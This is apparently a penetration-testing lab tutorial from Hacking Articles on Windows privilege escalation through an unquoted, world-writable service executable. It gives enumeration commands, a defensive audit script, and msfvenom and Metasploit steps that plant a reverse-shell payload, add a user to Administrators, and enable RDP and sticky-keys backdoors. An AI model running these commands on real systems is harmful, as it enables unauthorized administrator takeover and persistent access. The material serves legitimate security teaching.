Windows Privilege Escalation (Insecure File Permissions)

In this article, we demonstrate Windows privilege escalation via insecure file permissions. In a penetration test, when we spawn a command shell as a local user, we cannot read restricted files or folders, so we need to escalate privileges to obtain administrator access.

Table of Contents

  • Introduction
  • Lab setup
  • Spawn command shell as local user
  • Escalated privilege via Prepend-migrate
  • Escalated privilege via Adding user Administrators Group
  • Escalated privilege via RDP & Sticky_keys

Insecure File Permissions


The vulnerability is related to the path of a service executable that contains a space but is not enclosed in quotation marks (“”). If the executable additionally has writable permissions for low-privileged users, an attacker can replace it with a malicious exe file, which the service then launches, so as to escalate to admin privileges.

Lab set-up

Victim’s Machine: Windows 7

Attacker’s machine: Kali Linux

First, we downloaded and installed a vulnerable application, Photodex ProShow, on our Windows system; we found it on Exploit DB.

Spawning Victim’s Machine

We need to compromise the Windows machine at least once to gain a meterpreter session. As you can observe, we already have the victim’s meterpreter session. Now let’s open a command shell from here.


As you can observe, we have shell access as local_user, and to get cmd as administrator we need to escalate its privileges. First, we enumerate all the auto-start services on the victim’s machine and discover those whose binary path is not enclosed in quotes, with the help of the following command:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

So we have enumerated the following path: C:\Program Files\Photodex\ProShow Producer\Scsiaccess.exe. As you can see, there are no quotation marks around the path, and the path contains spaces.

Now let’s check the permissions on the executable using the following command:

icacls scsiaccess.exe

As you can observe, it grants write permission to Everyone, which means user raj can overwrite this file.
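The two conditions this section checks by hand (an auto-start service with an unquoted path containing spaces, and a service binary writable by low-privileged principals) can be audited from the output of the same two commands. The following is an added example, not code from the original article: the service tuples and the icacls output are constructed to mirror the lab, and the lists of low-privilege principals and write-type rights are assumptions.

```python
import re

# Constructed sample in the shape of `wmic service get name,pathname,startmode`
# (name, pathname, startmode); the ProShow entry mirrors the article's lab.
SAMPLE_SERVICES = [
    ("ScsiAccess", r"C:\Program Files\Photodex\ProShow Producer\Scsiaccess.exe", "Auto"),
    ("GoodSvc", r'"C:\Program Files\Good Vendor\svc.exe" -run', "Auto"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
    ("LazySvc", r"C:\Tools\Lazy Service\lazy.exe", "Manual"),
]

# Constructed sample output of `icacls scsiaccess.exe`; Everyone:(F) is the
# weak ACE the article relies on.
SAMPLE_ICACLS = r"""scsiaccess.exe Everyone:(F)
               NT AUTHORITY\SYSTEM:(F)
               BUILTIN\Administrators:(F)
               BUILTIN\Users:(RX)
Successfully processed 1 files; Failed processing 0 files"""

# Assumed set of principals that any local user belongs to.
LOW_PRIV = {"everyone", "builtin\\users", "users", "nt authority\\interactive",
            "nt authority\\authenticated users"}
# icacls rights that let the binary be modified, replaced or deleted.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "D", "DC"}

ACE_RE = re.compile(r"^(.+?):((?:\([A-Za-z,]+\))+)$")


def unquoted_service_paths(services):
    """Auto-start services outside C:\\Windows whose path contains a space
    and no surrounding quotes (the article's wmic | findstr filter in Python)."""
    return [name for name, path, mode in services
            if mode.lower() == "auto"
            and not path.lower().startswith("c:\\windows\\")
            and not path.startswith('"') and " " in path]


def writable_by_low_priv(icacls_output):
    """Low-privilege principals holding a write-type allow ACE on the file."""
    weak = []
    for i, raw in enumerate(icacls_output.splitlines()):
        line = raw.strip()
        if i == 0:  # icacls prefixes the first ACE with the file name
            line = re.sub(r"^\S+\s+", "", line)
        m = ACE_RE.match(line)
        if not m:
            continue  # blank line or the "Successfully processed" footer
        principal, rights = m.group(1), m.group(2)
        flags = {f for grp in re.findall(r"\(([^)]+)\)", rights) for f in grp.split(",")}
        if "DENY" in flags or principal.lower() not in LOW_PRIV:
            continue
        if flags & WRITE_RIGHTS:
            weak.append(principal)
    return weak


if __name__ == "__main__":
    print("unquoted auto-start paths:", unquoted_service_paths(SAMPLE_SERVICES))
    print("writable by low-priv:", writable_by_low_priv(SAMPLE_ICACLS))
```

A service that appears in both lists is the case this article exploits; the fix is to quote the path in the service configuration and remove the write-type rights from low-privilege principals.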

Escalated privilege via Prepend-migrate

Now we can place a malicious exe file in the same folder that will give us admin privileges when the service restarts, because Windows will launch this executable instead of the genuine one.

Open a terminal in Kali Linux and type the following command to generate an exe payload using msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=1234 prependmigrate=true prependmigrateprocess=explorer.exe -f exe > /root/Desktop/scsiaccess.exe

The above command creates a malicious exe file on the Desktop; now send this file to the victim. The prependmigrate options make the payload migrate into another process (explorer.exe here) as soon as it runs, so the attacker will not lose the session if the victim kills the payload’s original process.

Now replace the genuine executable file with the malicious exe. Here I have renamed the genuine Scsiaccess.exe to Scsiaccess.exe.orginal, uploaded the malicious Scsiaccess.exe into the same folder and then rebooted the victim’s machine.

move scsiaccess.exe scsiaccess.exe.orginal
upload /root/Desktop/scsiaccess.exe .

Simultaneously, we start a multi/handler listener in a new terminal to catch the meterpreter session with admin privileges.

use exploit/multi/handler
msf exploit(multi/handler) set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost
msf exploit(multi/handler) set lport 1234
msf exploit(multi/handler) exploit

Yuppie!! After some time we got a shell with admin privileges.

Escalated privilege via Adding user Administrators Group

After spawning a shell as local_user, we enumerated the list of all users, with or without admin privileges, and found that user raaz is not a member of the Administrators group.

net user
net user raaz

So again we generate an exe file, this time one that adds user raaz to the Administrators group. The name of our exe file will be the same, i.e. Scsiaccess.exe.

msfvenom -p windows/exec CMD='net localgroup administrators raaz /add' -f exe > /root/Desktop/scsiaccess.exe

Now repeat the steps above: replace the genuine executable file with the malicious exe file and reboot the host machine.

If you look at the following image, you can see that user raaz has become a member of the Administrators group.

Escalated privilege via RDP & Sticky_keys

Generate an exe using msfvenom with the same name, Scsiaccess.exe, and transfer it to the victim’s machine. Meanwhile, run multi/handler with an AutoRunScript that will enable the RDP service once the service restarts.

use exploit/multi/handler
msf exploit(multi/handler) set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost
msf exploit(multi/handler) set lport 1234
msf exploit(multi/handler) set AutoRunScript post/windows/manage/enable_rdp
msf exploit(multi/handler) exploit

Similarly, we can set the AutoRunScript to enable sticky keys once the service restarts.

msf exploit(multi/handler) set AutoRunScript post/windows/manage/sticky_keys
msf exploit(multi/handler) run

As you can observe from the screenshot below, another meterpreter session (session 3) has opened with administrative rights. Now let’s connect to the victim’s host via RDP.


Now press the Shift key 5 times in a row and you will get a command prompt as administrator.


Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.